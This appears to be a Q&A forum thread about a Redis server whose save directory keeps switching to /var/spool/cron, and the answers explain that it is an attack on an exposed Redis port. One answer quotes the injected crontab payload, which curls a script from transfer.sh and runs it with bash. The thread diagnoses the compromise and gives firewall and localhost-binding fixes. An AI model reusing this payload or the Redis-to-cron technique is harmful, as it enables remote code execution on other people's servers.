5

I have set up my redis-server so that CONFIG GET dir --> "/var/lib/redis" and CONFIG GET dbfilename --> "redis.rdb".

However, after my server has been running a few hours or a few days, I start getting the "Failed opening .rdb for saving: Permission denied" error.

If I again do CONFIG GET dir --> "/var/spool/cron" and CONFIG GET dbfilename --> "root". I have tried looking all over the place for some kind of understanding of what is happening, but without avail.

If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.

andy_roddam
  • 431
  • 5
  • 10

3 Answers3

11

This is indeed an attack. If you check your redis keys after this happens you will see few "string" keys like this: "Backup1", "Backup2", "Backup3".

The value of these will be something like this:

"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"

This is meant to modify your crontab.

Bottom line is - don't have redis port opened to the world.

igorl
  • 113
  • 1
  • 7
  • Just fell victim to this attack as well. Turns out I had DMZ on my router set to my machine's IP... Thanks! – Mario Tacke Jun 16 '18 at 00:32
  • I get exactly this only a few hours after rolling a new instance, and forgot to set firewall first! The redis server is inside an docker container. What should I do other than trying to recreate the instance all over again? – Thắng Trần Xuân Aug 21 '20 at 10:23
0

It seems as this may just be a security issue. Out of the box redis is accessible via any IP addresses. As a simple first step to check that this was a security issue as suggested by @ItamarHaber, I simply bound the redis server to localhost and now the problem seems to have resolved itself. Here is a great article that helped me with this.A few things about Redis security

andy_roddam
  • 431
  • 5
  • 10
0

this can be solved by restart VM, enable UFW firewall, allow those ip address which are autherised to access.

Jivaji Ihare
  • 1